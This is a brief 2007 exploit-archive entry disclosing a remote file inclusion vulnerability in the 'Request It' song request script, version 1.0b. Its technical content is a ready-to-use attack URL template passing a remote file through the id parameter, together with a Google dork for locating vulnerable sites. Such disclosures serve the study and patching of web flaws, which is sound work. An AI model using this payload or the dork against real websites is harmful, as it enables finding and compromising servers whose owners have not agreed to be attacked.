Request It 1.0b (index.php id) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Request It 1.0b (index.php id) Remote File Inclusion Vulnerability
# Published : 2007-04-12
# Author : hackberry
# Previous Title : Expow 0.8 (autoindex.php cfg_file) Remote File Inclusion Vulnerability
# Next Title : Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit

Request It : Song Request System 1.0b - remote file inclusion

Software: Request It : Song Request System
Type: remote file inclusion
Version: 1.0b
Date: 2007-04-09
Url: http://scripts.ringsworld.com/organizers/requestit/
Risc: middle

------------------------------------
Credit:

http://hackberry.ath.cx
mail[AT]hackberry.ath.cx

------------------------------------
Vulnerability:

http://[target]/?id=[REMOTEFILE]

------------------------------------
Google dork:

"[ Request us to play you a song ]"

# www.Syue.com [2007-04-12]